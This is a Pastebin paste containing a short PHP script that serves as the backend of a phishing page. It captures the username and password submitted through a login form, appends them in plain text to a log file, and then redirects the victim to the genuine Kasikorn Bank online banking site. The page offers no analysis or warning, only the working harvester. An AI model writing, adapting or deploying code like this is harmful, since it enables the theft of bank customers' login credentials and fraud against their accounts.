Advertisement
Guest User

login

a guest
Mar 6th, 2019
275
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.44 KB | None | 0 0
  1. <?php
  2.  
  3. if(isset($_POST['userName']) and isset($_POST['password']))
  4. {
  5. $username = $_POST['userName'];
  6. $password = $_POST['password'];
  7. // print_r($username." <br> ".$password);
  8.  
  9. $data = "Username : ".$username." Password: ".$password.PHP_EOL;
  10. file_put_contents('log.txt', $data,FILE_APPEND);
  11.  
  12. header('location: https://online.kasikornbankgroup.com/K-Online/');
  13. }
  14.  
  15. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement